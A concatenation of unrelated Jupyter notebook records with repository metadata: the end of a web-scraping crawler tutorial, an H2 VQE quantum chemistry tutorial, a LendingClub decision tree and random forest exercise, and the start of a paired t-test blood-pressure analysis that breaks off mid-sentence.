http://example.webscraping.com\nDownloading: http://example.webscraping.com/places/default/index/1\nDownloading: http://example.webscraping.com/places/default/index/2\nDownloading: http://example.webscraping.com/places/default/index/0\nDownloading: http://example.webscraping.com/places/default/view/Barbados-20\nhttp://example.webscraping.com/places/default/view/Barbados-20 ['431 square kilometres', '285,653', 'BB', 'Barbados', 'Bridgetown', 'NA', '.bb', 'BBD', 'Dollar', '+1-246', 'BB#####', '^(?:BB)*(\\\\d{5})$', 'en-BB', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Bangladesh-19\nhttp://example.webscraping.com/places/default/view/Bangladesh-19 ['144,000 square kilometres', '156,118,464', 'BD', 'Bangladesh', 'Dhaka', 'AS', '.bd', 'BDT', 'Taka', '880', '####', '^(\\\\d{4})$', 'bn-BD,en', 'MM IN ']\nDownloading: http://example.webscraping.com/places/default/view/Bahrain-18\nhttp://example.webscraping.com/places/default/view/Bahrain-18 ['665 square kilometres', '738,004', 'BH', 'Bahrain', 'Manama', 'AS', '.bh', 'BHD', 'Dinar', '973', '####|###', '^(\\\\d{3}\\\\d?)$', 'ar-BH,en,fa,ur', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Bahamas-17\nhttp://example.webscraping.com/places/default/view/Bahamas-17 ['13,940 square kilometres', '301,790', 'BS', 'Bahamas', 'Nassau', 'NA', '.bs', 'BSD', 'Dollar', '+1-242', '', '', 'en-BS', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Azerbaijan-16\nhttp://example.webscraping.com/places/default/view/Azerbaijan-16 ['86,600 square kilometres', '8,303,512', 'AZ', 'Azerbaijan', 'Baku', 'AS', '.az', 'AZN', 'Manat', '994', 'AZ ####', '^(?:AZ)*(\\\\d{4})$', 'az,ru,hy', 'GE IR AM TR RU ']\nDownloading: http://example.webscraping.com/places/default/view/Austria-15\nhttp://example.webscraping.com/places/default/view/Austria-15 ['83,858 square kilometres', '8,205,000', 'AT', 'Austria', 'Vienna', 'EU', '.at', 'EUR', 'Euro', '43', '####', '^(\\\\d{4})$', 'de-AT,hr,hu,sl', 'CH DE HU SK CZ IT SI LI ']\nDownloading: http://example.webscraping.com/places/default/view/Australia-14\nhttp://example.webscraping.com/places/default/view/Australia-14 ['7,686,850 square kilometres', '21,515,754', 'AU', 'Australia', 'Canberra', 'OC', '.au', 'AUD', 'Dollar', '61', '####', '^(\\\\d{4})$', 'en-AU', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Aruba-13\nhttp://example.webscraping.com/places/default/view/Aruba-13 ['193 square kilometres', '71,566', 'AW', 'Aruba', 'Oranjestad', 'NA', '.aw', 'AWG', 'Guilder', '297', '', '', 'nl-AW,es,en', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Armenia-12\nhttp://example.webscraping.com/places/default/view/Armenia-12 ['29,800 square kilometres', '2,968,000', 'AM', 'Armenia', 'Yerevan', 'AS', '.am', 'AMD', 'Dram', '374', '######', '^(\\\\d{6})$', 'hy', 'GE IR AZ TR ']\nDownloading: http://example.webscraping.com/places/default/view/Argentina-11\nhttp://example.webscraping.com/places/default/view/Argentina-11 ['2,766,890 square kilometres', '41,343,201', 'AR', 'Argentina', 'Buenos Aires', 'SA', '.ar', 'ARS', 'Peso', '54', '@####@@@', '^([A-Z]\\\\d{4}[A-Z]{3})$', 'es-AR,en,it,de,fr,gn', 'CL BO UY PY BR ']\nDownloading: http://example.webscraping.com/places/default/view/Antigua-and-Barbuda-10\nhttp://example.webscraping.com/places/default/view/Antigua-and-Barbuda-10 ['443 square kilometres', '86,754', 'AG', 'Antigua and Barbuda', \"St. John's\", 'NA', '.ag', 'XCD', 'Dollar', '+1-268', '', '', 'en-AG', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Antarctica-9\nhttp://example.webscraping.com/places/default/view/Antarctica-9 ['14,000,000 square kilometres', '0', 'AQ', 'Antarctica', '', 'AN', '.aq', '', '', '', '', '', '', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Anguilla-8\nhttp://example.webscraping.com/places/default/view/Anguilla-8 ['102 square kilometres', '13,254', 'AI', 'Anguilla', 'The Valley', 'NA', '.ai', 'XCD', 'Dollar', '+1-264', '', '', 'en-AI', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Angola-7\nhttp://example.webscraping.com/places/default/view/Angola-7 ['1,246,700 square kilometres', '13,068,161', 'AO', 'Angola', 'Luanda', 'AF', '.ao', 'AOA', 'Kwanza', '244', '', '', 'pt-AO', 'CD NA ZM CG ']\nDownloading: http://example.webscraping.com/places/default/view/Andorra-6\nhttp://example.webscraping.com/places/default/view/Andorra-6 ['468 square kilometres', '84,000', 'AD', 'Andorra', 'Andorra la Vella', 'EU', '.ad', 'EUR', 'Euro', '376', 'AD###', '^(?:AD)*(\\\\d{3})$', 'ca', 'ES FR ']\nDownloading: http://example.webscraping.com/places/default/view/American-Samoa-5\nhttp://example.webscraping.com/places/default/view/American-Samoa-5 ['199 square kilometres', '57,881', 'AS', 'American Samoa', 'Pago Pago', 'OC', '.as', 'USD', 'Dollar', '+1-684', '', '', 'en-AS,sm,to', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Algeria-4\nhttp://example.webscraping.com/places/default/view/Algeria-4 ['2,381,740 square kilometres', '34,586,184', 'DZ', 'Algeria', 'Algiers', 'AF', '.dz', 'DZD', 'Dinar', '213', '#####', '^(\\\\d{5})$', 'ar-DZ', 'NE EH LY MR TN MA ML ']\nDownloading: http://example.webscraping.com/places/default/view/Albania-3\nhttp://example.webscraping.com/places/default/view/Albania-3 ['28,748 square kilometres', '2,986,952', 'AL', 'Albania', 'Tirana', 'EU', '.al', 'ALL', 'Lek', '355', '', '', 'sq,el', 'MK GR CS ME RS XK ']\nDownloading: http://example.webscraping.com/places/default/view/Aland-Islands-2\nhttp://example.webscraping.com/places/default/view/Aland-Islands-2 ['1,580 square kilometres', '26,711', 'AX', 'Aland Islands', 'Mariehamn', 'EU', '.ax', 'EUR', 'Euro', '+358-18', '#####', '^(?:FI)*(\\\\d{5})$', 'sv-AX', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Afghanistan-1\nhttp://example.webscraping.com/places/default/view/Afghanistan-1 ['647,500 square kilometres', '29,121,286', 'AF', 'Afghanistan', 'Kabul', 'AS', '.af', 'AFN', 'Afghani', '93', '', '', 'fa-AF,ps,uz-AF,tk', 'TM CN IR TJ PK UZ ']\n" ], [ "all_links = link_crawler('http://example.webscraping.com', '/(index|view)/', scrape_callback=ScrapeCallback())", "Downloading: http://example.webscraping.com\nDownloading: http://example.webscraping.com/places/default/index/1\nDownloading: http://example.webscraping.com/places/default/index/2\nDownloading: http://example.webscraping.com/places/default/index/0\nDownloading: http://example.webscraping.com/places/default/view/Barbados-20\nDownloading: http://example.webscraping.com/places/default/view/Bangladesh-19\nDownloading: http://example.webscraping.com/places/default/view/Bahrain-18\nDownloading: http://example.webscraping.com/places/default/view/Bahamas-17\nDownloading: http://example.webscraping.com/places/default/view/Azerbaijan-16\nDownloading: http://example.webscraping.com/places/default/view/Austria-15\nDownloading: http://example.webscraping.com/places/default/view/Australia-14\nDownloading: http://example.webscraping.com/places/default/view/Aruba-13\nDownloading: http://example.webscraping.com/places/default/view/Armenia-12\nDownloading: http://example.webscraping.com/places/default/view/Argentina-11\nDownloading: http://example.webscraping.com/places/default/view/Antigua-and-Barbuda-10\nDownloading: http://example.webscraping.com/places/default/view/Antarctica-9\nDownloading: http://example.webscraping.com/places/default/view/Anguilla-8\nDownloading: http://example.webscraping.com/places/default/view/Angola-7\nDownloading: http://example.webscraping.com/places/default/view/Andorra-6\nDownloading: http://example.webscraping.com/places/default/view/American-Samoa-5\nDownloading: http://example.webscraping.com/places/default/view/Algeria-4\nDownloading: http://example.webscraping.com/places/default/view/Albania-3\nDownloading: http://example.webscraping.com/places/default/view/Aland-Islands-2\nDownloading: http://example.webscraping.com/places/default/view/Afghanistan-1\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1cb4003ec87f1a35975d6450dad8fefb132499
388,447
ipynb
Jupyter Notebook
examples/Tutorial_Disassociation_curve_end_to_end.ipynb
yaoyongxin/qucochemistry
b92384db4a54ec832c0615d252a8ec5ae4c913ef
[ "Apache-2.0" ]
null
null
null
examples/Tutorial_Disassociation_curve_end_to_end.ipynb
yaoyongxin/qucochemistry
b92384db4a54ec832c0615d252a8ec5ae4c913ef
[ "Apache-2.0" ]
null
null
null
examples/Tutorial_Disassociation_curve_end_to_end.ipynb
yaoyongxin/qucochemistry
b92384db4a54ec832c0615d252a8ec5ae4c913ef
[ "Apache-2.0" ]
null
null
null
220.332955
177,909
0.869799
[ [ [ "# End-to-end quantum chemistry VQE using Qu & Co Chemistry\nIn this tutorial we show how to solve the groundstate energy of a hydrogen molecule using VQE, as a function of the spacing between the atoms of the molecule. For a more detailed discussion on MolecularData generation or VQE settings, please refer to our other tutorials. We here focus on the exact UCCSD method, which is the upper bound of a UCCSD-based VQE approach performance. In reality, errors are incurred by Trotterizing the UCC Hamiltonian evolution.", "_____no_output_____" ] ], [ [ "from openfermion.hamiltonians import MolecularData\nfrom qucochemistry.vqe import VQEexperiment\nfrom openfermionpyscf import run_pyscf\nimport numpy as np\n\n#H2 spacing\nspacing =np.array([0.1,0.15,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.74,0.75,0.8,0.85,0.9,1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2.0,2.2,2.4,2.6,2.8,3.0])\nM=len(spacing)\n\n# Set molecule parameters and desired basis.\nbasis = 'sto-3g'\nmultiplicity = 1\n\n# Set calculation parameters.\nrun_scf = 1\nrun_mp2 = 1\nrun_cisd = 1\nrun_ccsd = 1\nrun_fci = 1\n\nE_fci=np.zeros([M,1])\nE_hf=np.zeros([M,1])\nE_ccsd=np.zeros([M,1])\nE_uccsd=np.zeros([M,1])\nE_uccsd_opt=np.zeros([M,1])\n\nfor i, space in enumerate(spacing):\n #construct molecule data storage object \n geometry = [('H', (0., 0., 0.)), ('H', (0., 0., space))]\n molecule = MolecularData(geometry, basis, multiplicity,description='pyscf_H2_' + str(space*100))\n\n molecule.filename = 'molecules/H2/H2_pyscf_' + str(space)[0] +'_' +str(space)[2:] #location of the .hdf5 file to store the data in\n\n # Run PySCF to add the data.\n molecule = run_pyscf(molecule,\n run_scf=run_scf,\n run_mp2=run_mp2,\n run_cisd=run_cisd,\n run_ccsd=run_ccsd,\n run_fci=run_fci)\n \n vqe = VQEexperiment(molecule=molecule,method='linalg', strategy='UCCSD')\n \n E_uccsd[i]=vqe.objective_function()\n \n vqe.start_vqe()\n \n E_uccsd_opt[i]=vqe.get_results().fun\n \n E_fci[i]=float(molecule.fci_energy)\n E_hf[i]=float(molecule.hf_energy)\n E_ccsd[i]=float(molecule.ccsd_energy)", "_____no_output_____" ] ], [ [ "We compare the results for 5 different strategies: classical HF, CCSD, and FCI, with a quantum unitary variant of CCSD, called UCCSD and its optimized version. In other words, we calculate the Hamiltonian expectation value for a wavefunction which was propagated by a UCCSD ansatz with CCSD amplitudes. Then we initiate an optimization algorithm over these starting amplitudes in order to reach even closer to the true ground state and thus minimizing the energy.\n\nIn essence, with the method='linalg' option, we do not create a quantum circuit, but rather directly take the matrix exponential of the UCC-Hamiltonian. In reality, for a gate-based architecture, one would need to select a Trotterization protocol to execute this action on a QPU, incurring Trotterization errors along the way. \n\nWe plot the results below:", "_____no_output_____" ] ], [ [ "%matplotlib notebook\n\nimport matplotlib.pyplot as plt\n\nplt.figure()\nplt.plot(spacing,E_hf,label='HF energy')\nplt.plot(spacing,E_ccsd,label='CCSD energy')\nplt.plot(spacing,E_uccsd,label='UCCSD energy (guess)')\nplt.plot(spacing,E_uccsd_opt,label='UCCSD energy (optim)')\nplt.plot(spacing,E_fci,label='FCI energy')\nplt.xlabel('spacing (Angstrom)')\nplt.ylabel('Energy (Hartree)')\nplt.title('Disassociation curve hydrogen molecule')\nplt.legend()", "_____no_output_____" ], [ "plt.figure()\nplt.semilogy(spacing,np.abs(E_fci-E_hf),label='HF energy')\nplt.semilogy(spacing,np.abs(E_fci-E_ccsd),label='CCSD energy')\nplt.semilogy(spacing,np.abs(E_fci-E_uccsd),label='UCCSD energy (guess)')\nplt.semilogy(spacing,np.abs(E_fci-E_uccsd_opt),label='UCCSD energy (optim)')\nplt.semilogy(spacing,0.0016*np.ones([len(spacing),1]),label='chemical accuracy',linestyle='-.',color='black')\nplt.xlabel('spacing (Angstrom)')\nplt.ylabel('Energy error with FCI (Hartree)')\nplt.title('Error with FCI - Disassociation curve hydrogen molecule')\nplt.legend()", "_____no_output_____" ] ], [ [ "We find that the HF energy is not within chemical accuracy with the FCI energy, while CCSD and UCCSD can reach that level. Clearly, for larger bond distances the approximations are less accurate but still the UCCSD optimization reaches numerical precision accuracy to the ground state. Note that the UCCSD method is not guaranteed to reach this level of accuracy with general molecules; one can experiment with that using this notebook before implementing the UCC in a quantum circuit, which will always perform worse.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ] ]
cb1cb4e55b28dfee01c1b60f32d432e6a76315f1
1,437
ipynb
Jupyter Notebook
logs/Untitled.ipynb
ceevaaa/Universal-Interpreter
e5b4ee87b5c0b2ae6e03f71091dbe2b4e0b68133
[ "Apache-2.0" ]
16
2020-01-14T17:53:13.000Z
2022-01-24T20:55:56.000Z
logs/Untitled.ipynb
ceevaaa/Universal-Interpreter
e5b4ee87b5c0b2ae6e03f71091dbe2b4e0b68133
[ "Apache-2.0" ]
4
2020-03-01T18:18:15.000Z
2022-02-06T17:51:17.000Z
logs/Untitled.ipynb
ceevaaa/Universal-Interpreter
e5b4ee87b5c0b2ae6e03f71091dbe2b4e0b68133
[ "Apache-2.0" ]
4
2020-01-14T17:39:15.000Z
2020-04-25T08:00:37.000Z
20.239437
52
0.487126
[ [ [ "import tensorflow as tf\ngf = tf.GraphDef()\nm_file = open('trained_graph.pb','rb')\ngf.ParseFromString(m_file.read())\n\nwith open('somefile.txt', 'a') as the_file:\n for n in gf.node:\n the_file.write(n.name+'\\n')\n\nfile = open('somefile.txt','r')\ndata = file.readlines()\nprint (\"output name = \")\nprint (data[len(data)-1])\n\nprint (\"Input name = \")\nfile.seek ( 0 )\nprint (file.readline())", "output name = \nfinal_result\n\nInput name = \nDecodeJpeg/contents\n\n" ] ] ]
[ "code" ]
[ [ "code" ] ]
cb1cb5608fc9dddee1a114ca0f07561726e44d01
2,757
ipynb
Jupyter Notebook
textbook_seperation_to_props.ipynb
mmehrani/elements_book
984184a6d417f03815a08106a4d1d6de73d3f937
[ "MIT" ]
null
null
null
textbook_seperation_to_props.ipynb
mmehrani/elements_book
984184a6d417f03815a08106a4d1d6de73d3f937
[ "MIT" ]
null
null
null
textbook_seperation_to_props.ipynb
mmehrani/elements_book
984184a6d417f03815a08106a4d1d6de73d3f937
[ "MIT" ]
null
null
null
19.692857
99
0.439246
[ [ [ "book_names = ['BOOK I.','BOOK II.','BOOK III.','BOOK IV.','BOOK V.','BOOK VI.','BOOK XI.']\nsections = []\nsections.extend(book_names)\nsections.extend(['APPENDIX.','NOTES.'])\nsections", "_____no_output_____" ], [ "# section_names_rep_dict = {}\n# for x in sections:\n# section_names_rep_dict[x] = []\n# section_names_rep_dict", "_____no_output_____" ], [ "book = open('Elements_book_directly_copied.txt','r')\nbook_lines = book.readlines()\n\nfor i in range(len(book_lines)):\n if book_lines[i].replace('\\n','') in sections:\n print(i)\n", "0\n1842\n2739\n4130\n4875\n6447\n8225\n8671\n9107\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code" ] ]
cb1cb666dddcd46e463aec05973c0189d5f0437c
202,351
ipynb
Jupyter Notebook
Machine Learning/Models/Comparing-the-results-of-Decision-Trees-and-Random-Forests-on-LendingClub-dataset.ipynb
KhushMody/Ds-Algo-HacktoberFest
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
[ "MIT" ]
12
2020-10-04T06:48:29.000Z
2021-02-16T17:54:04.000Z
Machine Learning/Models/Comparing-the-results-of-Decision-Trees-and-Random-Forests-on-LendingClub-dataset.ipynb
KhushMody/Ds-Algo-HacktoberFest
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
[ "MIT" ]
14
2020-10-04T09:09:52.000Z
2021-10-16T19:59:23.000Z
Machine Learning/Models/Comparing-the-results-of-Decision-Trees-and-Random-Forests-on-LendingClub-dataset.ipynb
KhushMody/Ds-Algo-HacktoberFest
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
[ "MIT" ]
55
2020-10-04T03:09:25.000Z
2021-10-16T09:00:12.000Z
176.725764
96,956
0.880668
[ [ [ "# Random Forest Project \n\nFor this project we will be exploring publicly available data from [LendingClub.com](www.lendingclub.com). Lending Club connects people who need money (borrowers) with people who have money (investors). Hopefully, as an investor you would want to invest in people who showed a profile of having a high probability of paying you back. We will try to create a model that will help predict this.\n\nLending club had a [very interesting year in 2016](https://en.wikipedia.org/wiki/Lending_Club#2016), so let's check out some of their data and keep the context in mind. This data is from before they even went public.\n\nWe will use lending data from 2007-2010 and be trying to classify and predict whether or not the borrower paid back their loan in full.\n\nHere are what the columns represent:\n* credit.policy: 1 if the customer meets the credit underwriting criteria of LendingClub.com, and 0 otherwise.\n* purpose: The purpose of the loan (takes values \"credit_card\", \"debt_consolidation\", \"educational\", \"major_purchase\", \"small_business\", and \"all_other\").\n* int.rate: The interest rate of the loan, as a proportion (a rate of 11% would be stored as 0.11). Borrowers judged by LendingClub.com to be more risky are assigned higher interest rates.\n* installment: The monthly installments owed by the borrower if the loan is funded.\n* log.annual.inc: The natural log of the self-reported annual income of the borrower.\n* dti: The debt-to-income ratio of the borrower (amount of debt divided by annual income).\n* fico: The FICO credit score of the borrower.\n* days.with.cr.line: The number of days the borrower has had a credit line.\n* revol.bal: The borrower's revolving balance (amount unpaid at the end of the credit card billing cycle).\n* revol.util: The borrower's revolving line utilization rate (the amount of the credit line used relative to total credit available).\n* inq.last.6mths: The borrower's number of inquiries by creditors in the last 6 months.\n* delinq.2yrs: The number of times the borrower had been 30+ days past due on a payment in the past 2 years.\n* pub.rec: The borrower's number of derogatory public records (bankruptcy filings, tax liens, or judgments).", "_____no_output_____" ], [ "# Import Libraries\n\n**Import the usual libraries for pandas and plotting.", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n%matplotlib inline", "_____no_output_____" ] ], [ [ "## Get the Data\n\n** Use pandas to read loan_data.csv as a dataframe called loans.**", "_____no_output_____" ] ], [ [ "loans = pd.read_csv('loan_data.csv')", "_____no_output_____" ] ], [ [ "** Check out the info(), head(), and describe() methods on loans.**", "_____no_output_____" ] ], [ [ "loans.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 9578 entries, 0 to 9577\nData columns (total 14 columns):\ncredit.policy 9578 non-null int64\npurpose 9578 non-null object\nint.rate 9578 non-null float64\ninstallment 9578 non-null float64\nlog.annual.inc 9578 non-null float64\ndti 9578 non-null float64\nfico 9578 non-null int64\ndays.with.cr.line 9578 non-null float64\nrevol.bal 9578 non-null int64\nrevol.util 9578 non-null float64\ninq.last.6mths 9578 non-null int64\ndelinq.2yrs 9578 non-null int64\npub.rec 9578 non-null int64\nnot.fully.paid 9578 non-null int64\ndtypes: float64(6), int64(7), object(1)\nmemory usage: 1.0+ MB\n" ], [ "loans.describe()", "_____no_output_____" ], [ "loans.head()", "_____no_output_____" ] ], [ [ "# Exploratory Data Analysis\n\n** Create a histogram of two FICO distributions on top of each other, one for each credit.policy outcome.**", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(10,6))\nloans[loans['credit.policy']==1]['fico'].hist(alpha=0.5,bins=30,color='blue',label='Credit.Policy=1')\nloans[loans['credit.policy']==0]['fico'].hist(alpha=0.5,bins=30,color='red',label='Credit.Policy=0')\nplt.legend()\nplt.xlabel('FICO')", "_____no_output_____" ] ], [ [ "** Create a similar figure, except this time select by the not.fully.paid column.**", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(10,6))\nloans[loans['not.fully.paid']==1]['fico'].hist(alpha=0.5,bins=30,color='blue',label='Credit.Policy=1')\nloans[loans['not.fully.paid']==0]['fico'].hist(alpha=0.5,bins=30,color='red',label='Credit.Policy=0')\nplt.legend()\nplt.xlabel('FICO')", "_____no_output_____" ] ], [ [ "** Create a countplot using seaborn showing the counts of loans by purpose, with the color hue defined by not.fully.paid. **", "_____no_output_____" ] ], [ [ "sns.countplot(x='purpose',data=loans,hue='not.fully.paid')", "_____no_output_____" ] ], [ [ "** Let's see the trend between FICO score and interest rate.**", "_____no_output_____" ] ], [ [ "sns.jointplot(x='fico',y='int.rate',data=loans,color='purple')", "_____no_output_____" ] ], [ [ "** Create the following lmplots to see if the trend differed between not.fully.paid and credit.policy.**", "_____no_output_____" ] ], [ [ "sns.lmplot(x='fico',y='int.rate',data=loans,hue='credit.policy',col='not.fully.paid')", "_____no_output_____" ] ], [ [ "# Setting up the Data\n\nLet's get ready to set up our data for our Random Forest Classification Model!\n\n**Check loans.info() again.**", "_____no_output_____" ] ], [ [ "loans.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 9578 entries, 0 to 9577\nData columns (total 14 columns):\ncredit.policy 9578 non-null int64\npurpose 9578 non-null object\nint.rate 9578 non-null float64\ninstallment 9578 non-null float64\nlog.annual.inc 9578 non-null float64\ndti 9578 non-null float64\nfico 9578 non-null int64\ndays.with.cr.line 9578 non-null float64\nrevol.bal 9578 non-null int64\nrevol.util 9578 non-null float64\ninq.last.6mths 9578 non-null int64\ndelinq.2yrs 9578 non-null int64\npub.rec 9578 non-null int64\nnot.fully.paid 9578 non-null int64\ndtypes: float64(6), int64(7), object(1)\nmemory usage: 1.0+ MB\n" ] ], [ [ "## Categorical Features\n\nNotice that the **purpose** column as categorical\n\n**Create a list of 1 element containing the string 'purpose'. Call this list cat_feats.**", "_____no_output_____" ] ], [ [ "cat_feat = ['purpose']", "_____no_output_____" ] ], [ [ "**Now use pd.get_dummies(loans,columns=cat_feats,drop_first=True) to create a fixed larger dataframe that has new feature columns with dummy variables. Set this dataframe as final_data.**", "_____no_output_____" ] ], [ [ "final_data = pd.get_dummies(loans,columns=cat_feat,drop_first=True)", "_____no_output_____" ], [ "final_data.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 9578 entries, 0 to 9577\nData columns (total 19 columns):\ncredit.policy 9578 non-null int64\nint.rate 9578 non-null float64\ninstallment 9578 non-null float64\nlog.annual.inc 9578 non-null float64\ndti 9578 non-null float64\nfico 9578 non-null int64\ndays.with.cr.line 9578 non-null float64\nrevol.bal 9578 non-null int64\nrevol.util 9578 non-null float64\ninq.last.6mths 9578 non-null int64\ndelinq.2yrs 9578 non-null int64\npub.rec 9578 non-null int64\nnot.fully.paid 9578 non-null int64\npurpose_credit_card 9578 non-null uint8\npurpose_debt_consolidation 9578 non-null uint8\npurpose_educational 9578 non-null uint8\npurpose_home_improvement 9578 non-null uint8\npurpose_major_purchase 9578 non-null uint8\npurpose_small_business 9578 non-null uint8\ndtypes: float64(6), int64(7), uint8(6)\nmemory usage: 1.0 MB\n" ] ], [ [ "## Train Test Split\n\nNow its time to split our data into a training set and a testing set!", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import train_test_split", "_____no_output_____" ], [ "X = final_data.drop('not.fully.paid',axis=1)\ny = final_data['not.fully.paid']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)", "_____no_output_____" ] ], [ [ "## Training a Decision Tree Model\n\nLet's start by training a single decision tree first!\n\n** Import DecisionTreeClassifier**", "_____no_output_____" ] ], [ [ "from sklearn.tree import DecisionTreeClassifier", "_____no_output_____" ] ], [ [ "**Create an instance of DecisionTreeClassifier() called dtree and fit it to the training data.**", "_____no_output_____" ] ], [ [ "dtree = DecisionTreeClassifier()", "_____no_output_____" ], [ "dtree.fit(X_train,y_train)", "_____no_output_____" ] ], [ [ "## Predictions and Evaluation of Decision Tree\n**Create predictions from the test set and create a classification report and a confusion matrix.**", "_____no_output_____" ] ], [ [ "pred = dtree.predict(X_test)", "_____no_output_____" ], [ "from sklearn.metrics import classification_report,confusion_matrix", "_____no_output_____" ], [ "print(classification_report(y_test,pred))", " precision recall f1-score support\n\n 0 0.85 0.83 0.84 2405\n 1 0.21 0.22 0.21 469\n\n accuracy 0.73 2874\n macro avg 0.53 0.53 0.53 2874\nweighted avg 0.74 0.73 0.74 2874\n\n" ], [ "print(confusion_matrix(y_test,pred))", "[[2000 405]\n [ 364 105]]\n" ] ], [ [ "## Training the Random Forest model\n\n**Create an instance of the RandomForestClassifier class and fit it to our training data from the previous step.**", "_____no_output_____" ] ], [ [ "from sklearn.ensemble import RandomForestClassifier", "_____no_output_____" ], [ "rfc = RandomForestClassifier(n_estimators=600)", "_____no_output_____" ], [ "rfc.fit(X_train,y_train)", "_____no_output_____" ] ], [ [ "## Predictions and Evaluation", "_____no_output_____" ] ], [ [ "pred = rfc.predict(X_test)", "_____no_output_____" ] ], [ [ "**Now create a classification report from the results.**", "_____no_output_____" ] ], [ [ "print(classification_report(y_test,pred))", " precision recall f1-score support\n\n 0 0.84 1.00 0.91 2405\n 1 0.75 0.01 0.03 469\n\n accuracy 0.84 2874\n macro avg 0.79 0.51 0.47 2874\nweighted avg 0.82 0.84 0.77 2874\n\n" ] ], [ [ "**Show the Confusion Matrix for the predictions.**", "_____no_output_____" ] ], [ [ "print(confusion_matrix(y_test,pred))", "[[2403 2]\n [ 463 6]]\n" ] ], [ [ "**What performed better the random forest or the decision tree?**", "_____no_output_____" ] ], [ [ "# RandomForestClassifier showed better results but the results are still not good enough, so future engineering is needed", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1cb6fdc3b20c3d527c296fae9210c695484b6f
61,987
ipynb
Jupyter Notebook
book/_build/jupyter_execute/inferential/demo02_PairedDifferenceT-Test.ipynb
hossainlab/statswithpy
981ecfe4937f18e4c8a8420f7c362cb187d6cbeb
[ "MIT" ]
null
null
null
book/_build/jupyter_execute/inferential/demo02_PairedDifferenceT-Test.ipynb
hossainlab/statswithpy
981ecfe4937f18e4c8a8420f7c362cb187d6cbeb
[ "MIT" ]
null
null
null
book/_build/jupyter_execute/inferential/demo02_PairedDifferenceT-Test.ipynb
hossainlab/statswithpy
981ecfe4937f18e4c8a8420f7c362cb187d6cbeb
[ "MIT" ]
null
null
null
86.453278
27,408
0.801475
[ [ [ "import pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.preprocessing import scale\n\nfrom scipy import stats\nimport researchpy as rp", "_____no_output_____" ] ], [ [ "https://github.com/Opensourcefordatascience/Data-sets/blob/master/blood_pressure.csv\n\nIn this dataset fictitious and contains blood pressure readings before and after an intervention. These are variables “bp_before” and “bp_after”.", "_____no_output_____" ] ], [ [ "bp_reading = pd.read_csv('datasets/blood_pressure.csv')", "_____no_output_____" ], [ "bp_reading.sample(10)", "_____no_output_____" ], [ "bp_reading.shape", "_____no_output_____" ], [ "bp_reading.describe().T", "_____no_output_____" ], [ "bp_reading[['bp_before', 'bp_after']].boxplot(figsize=(12, 8))", "_____no_output_____" ] ], [ [ "## The hypothesis being tested", "_____no_output_____" ], [ "* __Null hypothesis (H0): u1 = u2, which translates to the mean of sample 01 is equal to the mean of sample 02__\n* __Alternative hypothesis (H1): u1 ? u2, which translates to the means of sample 01 is not equal to sample 02__ ", "_____no_output_____" ], [ "## Assumption check \n\n* The samples are independently and randomly drawn\n* The distribution of the residuals between the two groups should follow the normal distribution\n* The variances between the two groups are equal", "_____no_output_____" ] ], [ [ "stats.levene(bp_reading['bp_after'], bp_reading['bp_before'])", "_____no_output_____" ], [ "bp_reading['bp_diff'] = scale(bp_reading['bp_after'] - bp_reading['bp_before'])", "/anaconda3/lib/python3.7/site-packages/sklearn/utils/validation.py:595: DataConversionWarning: Data with input dtype int64 was converted to float64 by the scale function.\n warnings.warn(msg, DataConversionWarning)\n" ], [ "bp_reading[['bp_diff']].head()", "_____no_output_____" ], [ "bp_reading[['bp_diff']].hist(figsize=(12, 8))", "_____no_output_____" ] ], [ [ "### Checking Normal distribution by Q-Q plot graph\nhttps://www.statisticshowto.datasciencecentral.com/assumption-of-normality-test/", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(15, 8))\nstats.probplot(bp_reading['bp_diff'], plot=plt)\n\nplt.title('Blood pressure difference Q-Q plot')\nplt.show()", "_____no_output_____" ] ], [ [ "**Note:-** The corresponding points are lies very close to line that means are our sample data sets are 